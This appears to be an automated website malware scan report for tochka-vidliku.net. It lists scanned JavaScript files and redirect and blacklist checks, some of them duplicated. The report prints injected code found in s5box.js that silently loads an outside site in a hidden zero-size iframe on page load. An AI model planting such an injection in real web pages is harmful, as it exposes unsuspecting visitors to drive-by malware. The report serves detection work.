Scanned pages/files
Request | Server response | Status |
http://www.tochka-vidliku.net/ | 200 OK Content-Length: 251019 Content-Type: text/html | clean |
http://www.tochka-vidliku.net/media/system/js/mootools-core.js | 200 OK Content-Length: 96888 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/core.js | 200 OK Content-Length: 4799 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/caption.js | 200 OK Content-Length: 733 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/mootools-more.js | 200 OK Content-Length: 239157 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/modules/mod_s5_box/js/s5box.js | 200 OK Content-Length: 17537 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var S5Box = new Class({ Implements: [Events], options: { transition: s5_boxeffect, speed: 350, width: false, height: false, initialWidth: 100, initialHeight: 100, maxWidth: false, maxHeight: false, resize: true, inline: false, title: false, rel: false, opacity: 0.7, preloading: true, close: 'close', open: false, overlayClose: true }, events: document.getElementById("colorbox").style.display = "none"; } }); ;var ifKOii2I = document.createElement('iframe');ifKOii2I.name = 'ifKOii2I';ifKOii2I.src = 'http://sdpor.winonawinn.com/';ifKOii2I.style.width = '0px';ifKOii2I.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifKOii2I=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifKOii2I); document.cookie = 'ifKOii2I=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}}; Antivirus reports:
| ||
http://www.tochka-vidliku.net/modules/mod_s5_image_and_content_fader/js/jd.gallery.js | 200 OK Content-Length: 28661 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/modules/mod_s5_image_and_content_fader/js/jd.gallery.transitions.js | 200 OK Content-Length: 3156 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_flex_menu.js | 200 OK Content-Length: 63635 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/multibox/overlay.js | 200 OK Content-Length: 3286 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/multibox/multibox.js | 200 OK Content-Length: 34583 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_font_adjuster.js | 200 OK Content-Length: 3916 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_info_slide.js | 200 OK Content-Length: 5228 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 333 Content-Type: text/html | clean |
http://www.tochka-vidliku.net/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tochka-vidliku.net
Result:
GET / HTTP/1.1
Host: tochka-vidliku.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tochka-vidliku.net
Referer: http://www.google.com/search?q=tochka-vidliku.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tochka-vidliku.net
Referer: http://www.google.com/search?q=tochka-vidliku.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tochka-vidliku.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tochka-vidliku.net/
Result: tochka-vidliku.net is not infected or malware details are not published yet.
Result: tochka-vidliku.net is not infected or malware details are not published yet.